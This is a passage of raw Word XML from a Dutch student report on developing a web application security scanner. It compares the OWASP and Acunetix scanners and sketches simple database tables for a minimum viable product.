      <w:r w:rsidR="00C11C39">
        <w:t xml:space="preserve">eer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11C39">
        <w:t>verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C11C39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tijdens het scannen </w:t>
      </w:r>
      <w:r w:rsidR="00C11C39">
        <w:t xml:space="preserve">en laat een tabel zien waar in een vlug tempo, alle URL’s waar aanvallen op verricht worden </w:t>
      </w:r>
      <w:r w:rsidR="002B2771">
        <w:t>zien</w:t>
      </w:r>
      <w:r w:rsidR="00181F76">
        <w:t>, dit</w:t>
      </w:r>
      <w:r w:rsidR="002B2771">
        <w:t xml:space="preserve"> zonder enige context te geven over de vooruitgang van de scan</w:t>
      </w:r>
      <w:r w:rsidR="00617662">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B2771">
        <w:t xml:space="preserve"> behalve dan de </w:t>
      </w:r>
      <w:r w:rsidR="009A4EC5">
        <w:t>procesbalk. E</w:t>
      </w:r>
      <w:r w:rsidR="006E29FB">
        <w:t xml:space="preserve">en voordeel dat alle getoonde informatie biedt, is dat </w:t>
      </w:r>
      <w:r w:rsidR="001F3849">
        <w:t>het als data kan dienen in een Excel sheet waaruit analyses gemaakt kunnen worden.</w:t>
      </w:r>
      <w:r w:rsidR="003E3262">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E62F6E" w14:textId="43BE170B" w:rsidR="00071021" w:rsidRDefault="00F321B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251836416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E86C6A4" wp14:editId="437F683B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1824355</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760720" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0"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B992CF2" w14:textId="47C4EDF4" w:rsidR="00CE4BB5" w:rsidRPr="00B2596E" w:rsidRDefault="00CE4BB5" w:rsidP="00F321B8">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 3.4.2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6C6A4" id="Text Box 46" o:spid="_x0000_s1054" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.15pt;margin-top:143.65pt;width:453.6pt;height:21.2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HAtDjgCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0E0ApdRKgYFdOkqq0E&#10;U5+N45BIts87GxL263d2CN26PU17Mee783e577tjcdcZzU4KfQO24JPRmDNlJZSNPRT8227z4ZYz&#10;H4QthQarCn5Wnt8t379btC5XU6hBlwoZgVift67gdQguzzIva2WEH4FTloIVoBGBrnjIShQtoRud&#10;TcfjWdYClg5BKu/Je98H+TLhV5WS4amqvApMF5y+LaQT07mPZ7ZciPyAwtWNvHyG+IevMKKxVPQK&#10;dS+CYEds/oAyjUTwUIWRBJNBVTVSpR6om8n4TTfbWjiVeiFyvLvS5P8frHw8PSNryoJ/nHFmhSGN&#10;dqoL7DN0jFzET+t8TmlbR4mhIz/pPPg9OWPbXYUm/lJDjOLE9PnKbkST5LyZz8bzKYUkxaazT7fz&#10;mwiTvb526MMXBYZFo+BI6iVSxenBhz51SInFPOim3DRax0sMrDWykyCl27oJ6gL+W5a2MddCfNUD&#10;9h6VRuVSJTbcNxat0O27RND02vUeyjORgdCPk3dy01D5B+HDs0CaH2qSdiI80VFpaAsOF4uzGvDH&#10;3/wxn2SlKGctzWPB/fejQMWZ/mpJ8Di8g4GDsR8MezRroMYntG1OJpMeYNCDWSGYF1qVVaxCIWEl&#10;1Sp4GMx16LeCVk2q1Sol0Yg6ER7s1skIPdC8614EuotIgeR9hGFSRf5Gqz43qeVWx0DEJyEjsT2L&#10;NADxQuOdRuGyinF/fr2nrNc/jOVPAAAA//8DAFBLAwQUAAYACAAAACEAz/5aDuEAAAAIAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPMU/DMBCFdyT+g3VILIg6pKVNQ5yqqmCgS0XapZsbu3EgPke204Z/&#10;zzHBdnfv6d33itVoO3bRPrQOBTxNEmAaa6dabAQc9m+PGbAQJSrZOdQCvnWAVXl7U8hcuSt+6EsV&#10;G0YhGHIpwMTY55yH2mgrw8T1Gkk7O29lpNU3XHl5pXDb8TRJ5tzKFumDkb3eGF1/VYMVsJsdd+Zh&#10;OL9u17Opfz8Mm/lnUwlxfzeuX4BFPcY/M/ziEzqUxHRyA6rAOgFT8glIswUNJC+TxTOwE93TZQa8&#10;LPj/AuUPAAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANBwLQ44AgAAeAQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM/+Wg7hAAAACAEAAA8AAAAA&#10;AAAAAAAAAAAAkAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B992CF2" w14:textId="47C4EDF4" w:rsidR="00CE4BB5" w:rsidRPr="00B2596E" w:rsidRDefault="00CE4BB5" w:rsidP="00F321B8">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.4.2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00071021">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251834368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FD3C9DC" wp14:editId="692EFC17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1771650"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635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WASP scan.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1771650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001F3849">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B2771">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B9CBA" w14:textId="77777777" w:rsidR="007E23B2" w:rsidRDefault="00071021">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00247236">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Wat betreft de datastructuur die beide tools hanteren en de data dat </w:t>
      </w:r>
      <w:r w:rsidR="00DF5BDD">
        <w:t xml:space="preserve">verzameld wordt </w:t>
      </w:r>
      <w:r w:rsidR="005C6D50">
        <w:t>zijn ook verschillen te vinden. Kenmerkend voor OWASP is de hoevee</w:t>
      </w:r>
      <w:r w:rsidR="00684772">
        <w:t xml:space="preserve">lheid data dat verzameld wordt. De data wordt op een onoverzichtelijk manier gepresenteerd in de applicatie. Dit maakt deze tool minder gebruiksvriendelijker dan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D6E14">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D6E14">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B9609D">
        <w:t xml:space="preserve">Waar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B9609D">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B9609D">
        <w:t xml:space="preserve"> 4 tabellen gebruikers genoeg data om er nuttige informatie van te maken, gebruikt OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00C73B63">
        <w:t>6 tabellen met meer als genoeg data</w:t>
      </w:r>
      <w:r w:rsidR="00374BD8">
        <w:t>. Omdat ik een MVP maak is het van belang dat ik alleen essenti</w:t>
      </w:r>
      <w:r w:rsidR="004730E1">
        <w:t xml:space="preserve">ële data verzamel en het niet te druk maak. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D5519B" w14:textId="77777777" w:rsidR="00191B6C" w:rsidRPr="005339D9" w:rsidRDefault="00191B6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005339D9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Datastructuur voor een MVP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B888C1" w14:textId="3AEFDE7F" w:rsidR="00256FA3" w:rsidRDefault="00792327">
      <w:r>
        <w:t>Een MVP heeft informatie nodig ov</w:t>
      </w:r>
      <w:r w:rsidR="000C308D">
        <w:t xml:space="preserve">er de volgende vijf onderwerpen, als je er één zou weghalen dan kun je geen </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="000C308D">
        <w:t xml:space="preserve"> bouwen.</w:t>
      </w:r>
      <w:r w:rsidR="00986BA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3B174" w14:textId="2B888D02" w:rsidR="007F1D35" w:rsidRDefault="00FF5975" w:rsidP="009C0970">
      <w:r>
        <w:t>De tabellen</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="000318EF" w14:paraId="79426709" w14:textId="77777777" w:rsidTr="000318EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A1EE5E" w14:textId="7ABC87DD" w:rsidR="00DB141A" w:rsidRDefault="00DB141A" w:rsidP="001A61C4">
            <w:r>
              <w:t>Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="20DF33FD" w14:textId="77777777" w:rsidTr="000318EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0377AAC7" w14:textId="0D78797E" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000318EF" w14:paraId="297E246B" w14:textId="77777777" w:rsidTr="000318EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDA4462" w14:textId="61D982AE" w:rsidR="00DB141A" w:rsidRDefault="000318EF" w:rsidP="001A61C4">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D8D540" w14:textId="77777777" w:rsidR="001A61C4" w:rsidRDefault="001A61C4" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00042CD0" w14:paraId="313BA47D" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661E3DF4" w14:textId="5D1925A3" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4">
            <w:r>
              <w:t>Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042CD0" w14:paraId="31B20CA1" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582229FF" w14:textId="35D25005" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (Sleutel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00042CD0" w14:paraId="5FCD2BE0" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="169B5309" w14:textId="3935AFA7" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4">
            <w:r>
              <w:t>Value (waarde)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E75B8E5" w14:textId="77777777" w:rsidR="000318EF" w:rsidRDefault="000318EF" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A1093" w14:paraId="0B569DAA" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B183930" w14:textId="20955BF6" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="001A61C4">
            <w:r>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="1DCBD623" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14EB3137" w14:textId="3BDDE27B" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="001A61C4">
            <w:r>
              <w:t xml:space="preserve">Methode </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="279F2D30" w14:textId="77777777" w:rsidTr="008A1093">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE2B74F" w14:textId="4A465BB4" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="001A61C4">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6054A0AA" w14:textId="77777777" w:rsidR="00042CD0" w:rsidRDefault="00042CD0" w:rsidP="001A61C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="008A1093" w14:paraId="16D755C5" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC7320A" w14:textId="7D56423C" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4">
            <w:r>
              <w:t>Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="1199CA94" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E021984" w14:textId="203AE579" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4">
            <w:r>
              <w:t>Module naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="348B2466" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53FD3946" w14:textId="160F60B4" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="741C50D7" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59001B18" w14:textId="31F16B02" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A1093" w14:paraId="093E9D5C" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5776F269" w14:textId="28140021" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426797B8" w14:textId="77777777" w:rsidR="002748C4" w:rsidRDefault="002748C4" w:rsidP="002748C4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC5546" w14:paraId="76B3BFEB" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06C961A6" w14:textId="0E50E065" w:rsidR="008A6BA6" w:rsidRDefault="008A6BA6" w:rsidP="002748C4">
            <w:r>
              <w:t>Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC5546" w14:paraId="0B7C1096" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D6976D" w14:textId="455AFC4A" w:rsidR="008A6BA6" w:rsidRDefault="008A6BA6" w:rsidP="002748C4">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC5546" w14:paraId="6082A06A" w14:textId="77777777" w:rsidTr="00AC5546">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A0B59D9" w14:textId="215E6548" w:rsidR="008A6BA6" w:rsidRDefault="008A6BA6" w:rsidP="002748C4">
            <w:r>
              <w:t>Bestand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2255C08D" w14:textId="77777777" w:rsidR="008A1093" w:rsidRDefault="008A1093" w:rsidP="002748C4"/>
    <w:p w14:paraId="065289AC" w14:textId="584A7334" w:rsidR="008A79F1" w:rsidRPr="00035572" w:rsidRDefault="008A79F1">
      <w:r w:rsidRPr="003E572F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584407D" w14:textId="1C54CD66" w:rsidR="00173EB3" w:rsidRDefault="00173EB3" w:rsidP="00C52533">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc491022075"/>
      <w:r w:rsidRPr="00173EB3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E95CCA9" wp14:editId="559AD12F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>319405</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5534025" cy="647700"/>
                <wp:effectExtent l="0" t="0" r="28575"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647700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="742A6933" w14:textId="5695AB29" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Deelvragen</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="700CBA8E" w14:textId="7DB6C230" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00513C66">
                            <w:r>
                              <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een Web Security Scanner?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46D42F31" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB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5CCA9" id="_x0000_s1055" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:25.15pt;width:435.75pt;height:51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PKGSgCAABOBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L7Y8ZKmNeIUXboMA7oL&#10;0O4DaFmOhciiJymxs68fJadZ0A17GOYHQRSpI/Ic0svbodXsIK1TaAo+naScSSOwUmZb8G9PmzfX&#10;nDkPpgKNRhb8KB2/Xb1+tey7XGbYoK6kZQRiXN53BW+87/IkcaKRLbgJdtKQs0bbgifTbpPKQk/o&#10;rU6yNL1KerRVZ1FI5+j0fnTyVcSvayn8l7p20jNdcMrNx9XGtQxrslpCvrXQNUqc0oB/yKIFZejR&#10;M9Q9eGB7q36DapWw6LD2E4FtgnWthIw1UDXT9EU1jw10MtZC5LjuTJP7f7Di8+GrZaoqeDZdcGag&#10;JZGe5M75A+xYFvjpO5dT2GNHgX54hwPpHGt13QOKnWMG1w2YrbyzFvtGQkX5TcPN5OLqiOMCSNl/&#10;woqegb3HCDTUtg3kER2M0Emn41kbOXgm6HA+fztLszlngnxXs8UijeIlkD/f7qzzHyS2LGwKbkn7&#10;iA6HB+dDNpA/h4THHGpVbZTW0bDbcq0tOwD1ySZ+sYAXYdqwvuA3c8rj7xBp/P4E0SpPDa9VW/Dr&#10;cxDkgbb3port6EHpcU8pa3PiMVA3kuiHchglO+tTYnUkZi2ODU4DSZsG7Q/Oemrugrvve7CSM/3R&#10;kDo309ksTEM0ZvNFRoa99JSXHjCCoAruORu3ax8nKFBg8I5UrFUkOMg9ZnLKmZo28n4asDAVl3aM&#10;+vUbWP0EAAD//wMAUEsDBBQABgAIAAAAIQA8OOz73gAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1s&#10;TI/BTsMwEETvSPyDtUhcEHXakDaEOBVCAsEN2gqubrxNIuJ1sN00/D3LCY6jGc28KdeT7cWIPnSO&#10;FMxnCQik2pmOGgW77eN1DiJETUb3jlDBNwZYV+dnpS6MO9EbjpvYCC6hUGgFbYxDIWWoW7Q6zNyA&#10;xN7BeasjS99I4/WJy20vF0mylFZ3xAutHvChxfpzc7QK8pvn8SO8pK/v9fLQ38ar1fj05ZW6vJju&#10;70BEnOJfGH7xGR0qZtq7I5kgegV8JCrIkhQEu/lqnoHYcyxbpCCrUv7nr34AAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEAUvPKGSgCAABOBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAPDjs+94AAAAHAQAADwAAAAAAAAAAAAAAAACABAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="742A6933" w14:textId="5695AB29" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t>Deelvragen</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="700CBA8E" w14:textId="7DB6C230" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00513C66">
                      <w:r>
                        <w:t>Wat zijn de tools en technieken die ik kan gebruiken bij het ontwikkelen van een Web Security Scanner?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46D42F31" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C52533">
        <w:t>3.5</w:t>
      </w:r>
      <w:r w:rsidR="00A878AF" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1550D">
        <w:t>Technologie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="375BA57C" w14:textId="77777777" w:rsidR="00316BA5" w:rsidRPr="00316BA5" w:rsidRDefault="00316BA5" w:rsidP="0095687C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA6F104" w14:textId="051E5505" w:rsidR="0095687C" w:rsidRPr="00486596" w:rsidRDefault="00330C02" w:rsidP="00330C02">
